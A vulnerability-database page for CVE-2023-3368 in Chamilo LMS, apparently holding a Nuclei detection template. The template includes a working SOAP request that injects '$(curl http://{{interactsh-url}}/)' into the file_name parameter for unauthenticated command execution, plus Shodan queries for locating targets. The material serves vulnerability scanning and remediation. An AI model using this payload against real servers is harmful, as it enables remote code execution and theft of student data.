| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2023-3368 | 17 Dec 202314:43 | – | circl | |
| Chamilo LMS Security Vulnerability | 28 Nov 202300:00 | – | cnnvd | |
| CVE-2023-3368 | 28 Nov 202307:05 | – | cve | |
| CVE-2023-3368 Chamilo LMS Unauthenticated Command Injection | 28 Nov 202307:05 | – | cvelist | |
| CVE-2023-3368 | 28 Nov 202307:15 | – | nvd | |
| Chamilo LMS 1.11.x < 1.11.22 Multiple Vulnerabilities | 1 Dec 202300:00 | – | openvas | |
| CVE-2023-3368 | 28 Nov 202307:15 | – | osv | |
| Command injection | 28 Nov 202307:15 | – | prion | |
| PT-2023-24446 · Unknown · Chamilo Lms | 28 Nov 202300:00 | – | ptsecurity | |
| CVE-2023-3368 | 23 May 202503:53 | – | redhatcve |
id: CVE-2023-3368
info:
name: Chamilo LMS <= v1.11.20 Unauthenticated Command Injection
author: dwisiswant0
severity: critical
description: |
Command injection in `/main/webservices/additional_webservices.php`
in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain
remote code execution via improper neutralisation of special characters.
impact: |
Unauthenticated attackers can execute arbitrary system commands through the wsConvertPpt SOAP endpoint by injecting special characters in the file_name parameter, potentially compromising the entire Chamilo LMS platform and accessing student data.
remediation: |
Update Chamilo LMS to a version newer than 1.11.20 that properly neutralizes special characters and validates input in additional_webservices.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-3368
- https://starlabs.sg/advisories/23/23-3368/
- https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-121-2023-07-05-Critical-impact-High-risk-Unauthenticated-Command-Injection-CVE-2023-3368
- https://github.com/chamilo/chamilo-lms/commit/37be9ce7243a30259047dd4517c48ff8b21d657a
- https://https://github.com/chamilo/chamilo-lms/commit/4c69b294f927db62092e01b70ac9bd6e32d5b48b
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-3368
cwe-id: CWE-78
epss-score: 0.68897
epss-percentile: 0.99263
cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: chamilo
product: chamilo
shodan-query:
- http.component:"Chamilo"
- http.component:"chamilo"
- cpe:"cpe:2.3:a:chamilo:chamilo"
tags: cve2023,cve,chamilo,unauth,cmd,rce,vkev,vuln
http:
- method: POST
path:
- "{{BaseURL}}/main/webservices/additional_webservices.php"
headers:
Content-Type: application/xml
body: |
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{BaseURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns1:wsConvertPpt>
<param0 xsi:type="ns2:Map">
<item>
<key xsi:type="xsd:string">file_data</key>
<value xsi:type="xsd:string"></value>
</item>
<item>
<key xsi:type="xsd:string">file_name</key>
<value xsi:type="xsd:string">$(curl http://{{interactsh-url}}/)</value>
</item>
<item>
<key xsi:type="xsd:string">service_ppt2lp_size</key>
<value xsi:type="xsd:string">720x540</value>
</item>
</param0>
</ns1:wsConvertPpt>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "wsConvertPptResponse"
part: body
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# digest: 4a0a00473045022031fdee831e1a7a531db1508b21fe3f7c483523659a68812475ae4a2d8708d6db022100b39ef1fbf03f2f7c58c606ace5953c31317e6f7cd5fa347c5bab968a02c0b364:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation